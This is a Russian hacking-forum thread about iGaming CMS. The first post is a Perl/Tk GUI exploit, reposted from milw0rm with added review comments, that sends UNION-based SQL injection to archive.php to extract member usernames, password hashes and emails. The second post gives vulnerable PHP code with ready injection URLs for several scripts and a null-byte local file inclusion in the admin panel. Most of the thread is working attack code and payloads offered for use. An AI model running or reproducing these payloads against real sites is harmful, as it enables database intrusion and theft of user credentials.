iGaming CMS <= 1.3.1 Remote SQL Injection Exploit


#1
aka PSIH

aka PSIH

    ~~~

  • Extended
  • PipPip
  • 238 сообщений
iGaming CMS <= 1.3.1 Remote SQL Injection Exploit

exp:
#!/usr/bin/perl

	use Tk;
	use Tk::BrowseEntry;
	use Tk::DialogBox;
	use LWP::UserAgent;

	# --- GUI setup ---
	# NOTE(review): the file has no `use strict; use warnings;`, so every
	# variable below is an undeclared package global.  `new MainWindow(...)`
	# is indirect-object syntax; the conventional form is MainWindow->new(...).
	$mw = new MainWindow(title => "UnderWHAT?!" );

	$mw->geometry ( '395x180' );
	$mw->resizable(0,0);

	# Empty labels with tiny fonts are used purely as vertical spacers.
	$mw->Label(-text => '', -font => '{Verdana} 2',-foreground=>'red')->pack();
	$mw->Label(-text => 'iGaming cms <= 1.3.1 Remote Sql Injection', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
	$mw->Label(-text => 'found by gemaglabin [ mafia of antichat ]', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
	$mw->Label(-text => '', -font => '{Tahoma} 2 bold',-foreground=>'red')->pack();


	# Two side-by-side frames: labels on the left, inputs/buttons on the right.
	$fleft  = $mw->Frame()->pack ( -side => 'left', -anchor => 'ne');
	$fright = $mw->Frame()->pack ( -side => 'left', -anchor => 'nw');

	# Defaults shown in the form; $url and $user_id are bound to Entry
	# widgets below and read by get_hash().  $prefix is used by get_hash().
	# $table and $report are assigned here but never referenced anywhere in
	# this file (dead globals).
	$url	  = 'http://test2.ru/igaming/';
	$user_id  = '1';
	$prefix   = 'sp_';
	$table	= 'users';
	$report   = '';
	


	$fleft->Label ( -text => 'Path to site index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );
	$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' );

	$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' );
	$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' );

	# $hash is never initialised before this point; the Entry simply displays
	# whatever get_hash()/test_vuln() later store in the global.
	$fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );
	$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$hash) ->pack ( -side => "top" , -anchor => 'w' );

	$fright->Label( -text => ' ')->pack();
	$fleft->Label( -text => ' ')->pack();
	
	# Buttons dispatch to the two handlers defined after MainLoop().
	$fleft->Label ( -text => "Test site vulnerability", -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );
	$fright->Button(-text	=> "Test site vulnerability",
					-relief => "groove",
					-width => '30',
					-font => '{Verdana} 8 bold',
					-activeforeground => 'red',
					-command => \&test_vuln
				   )->pack();
				   
				   
	$fleft->Label ( -text => "Get all possible data ", -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );
	$fright->Button(-text	=> 'Get data from database',
					-relief => "groove",
					-width => '30',
					-font => '{Verdana} 8 bold',
					-activeforeground => 'red',
					-command => \&get_hash
				   )->pack();
				  
	
	# Blocks in the Tk event loop; the subs below are only reached via the
	# button callbacks.
	MainLoop();
	
	# Callback for the 'Get data from database' button.
	# Sends one POST to $url."archive.php" whose `section` field carries the
	# UNION-based payload shown below (this request shape is what a WAF/IDS
	# signature for this issue would key on), then stores the text after
	# "Date Posted: " from the raw response into the global $hash, which the
	# 'Returned data' Entry displays.  Reads globals $mw, $url, $prefix,
	# $user_id; writes $xpl, $InfoWindow, $res, $hash.
	# NOTE(review): the empty prototype `()` is not argument validation and
	# should be dropped; $InfoWindow is created but never Show()n; the
	# response status is never checked; `die` carries no message.
	sub get_hash()
	{
		$xpl = LWP::UserAgent->new( ) or die;
		$InfoWindow=$mw->DialogBox(-title   => 'get hash from database', -buttons => ["OK"]);
		$res = $xpl->post($url."archive.php",['section'=>'-1 union select 1,2,concat_ws(char(32),pseudo,pass,email,nom),4 from '.$prefix.'members where id='.$user_id.'/*']);
		# as_string includes headers; the match is against the whole response.
		if($res->as_string =~ /Date Posted: (.*)</)
		{
			$hash = $1;
		}
	}

	 
	# Callback for the 'Test site vulnerability' button.
	# POSTs a lone single quote as `section` to $url."archive.php" and sets
	# the global $hash (shown in the 'Returned data' Entry) to 'SITE VULNERABLE'
	# if the raw response contains "Fatal error" (case-insensitive), else
	# 'SITE UNVULNERABLE'.  This is an error-message heuristic: it depends on
	# the target displaying PHP errors, so either verdict can be wrong.
	# Reads globals $mw, $url; writes $InfoWindow, $xpl, $res, $hash.
	# NOTE(review): the DialogBox is populated but never Show()n, so nothing
	# is displayed; the empty prototype `()` should be dropped; `die` has no
	# message.
	sub test_vuln()
	{
		$InfoWindow=$mw->DialogBox(-title   => 'test site vulnerability', -buttons => ["OK"]);
		$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
		$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
		$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
		$xpl = LWP::UserAgent->new( ) or die;
		$res = $xpl->post($url."archive.php",['section'=>"'"]);
		if($res->as_string =~ /Fatal error/i ) { $hash='SITE VULNERABLE'}
		else { $hash = 'SITE UNVULNERABLE'} 
	}
©milw0rm.com
Everything that was made by human is possible to crack => ideal protection does not exist
*********
icq:162295
*********

#2
xUnu

xUnu

    Байт

  • Members
  • Pip
  • 65 сообщений
iGaming CMS
Product : iGaming CMS
version : 1.5
site : forums.igamingcms.com

SQL injection
mq=off (magic_quotes_gpc disabled)
games.php

 $sql = "SELECT `id`,`title`,`section`,`genre`,`developer`,`publisher`,`release_date` FROM `sp_games` ";

   if (!empty($_REQUEST['title'])) {

	  $sql .= "WHERE `title` LIKE '$_REQUEST[title]%' ";

	  if (!empty($_REQUEST['section'])) {

		 $sql .= " AND `section` = '$_REQUEST[section]' ";

	  }

	  $sql .= " AND `published` = '1' ";

   } else {

	  if (!empty($_REQUEST['section'])) {

		$sql .= "WHERE `section` = '$_REQUEST[section]' AND `published` = '1' ";

	  } else {

		  $sql .= "WHERE `published` = '1' ";

...
 
 if ($sql == "SELECT `id`,`title`,`section`,`genre`,`developer`,`publisher`,`release_date` FROM `sp_games` WHERE `published` = '1' ORDER BY `title` ASC")
]
http://localhost/games.php?order=genre&section=%27+and+1=0+union+all+select+1,version%28%29,3,4,5,6,7--+&sort=
index.php
http://localhost/index.php?do=viewarticle&id=2'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8,9--+
previews.php
$preview = $db->Execute("SELECT * FROM `sp_previews` WHERE `id` = '$_REQUEST[id]'");
http://localhost/previews.php?do=view&id=1'+union+all+select+1,2,3,4,5--+


Admin Panel (SQL inj) (LFI)
LFI : support.php

]require_once("../sources/docs/$_REQUEST[id].php");
]
http://localhost/admin/support.php?id=../../file%00
SQL injection : screenshots.php
mq=off (magic_quotes_gpc disabled)
]   if (isset($_REQUEST['s'])) {
	  $latestPreview = $db->Execute("SELECT id,title,section FROM `sp_screenshots` WHERE `section` = '$_REQUEST[s]' ORDER BY `id` DESC");
]
http://localhost/admin/screenshots.php?s=1'+and+1=0+union+all+select+1,version(),3--+

© для сильно умных (на античате опубликовал эти дыры я )))
O_o


Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных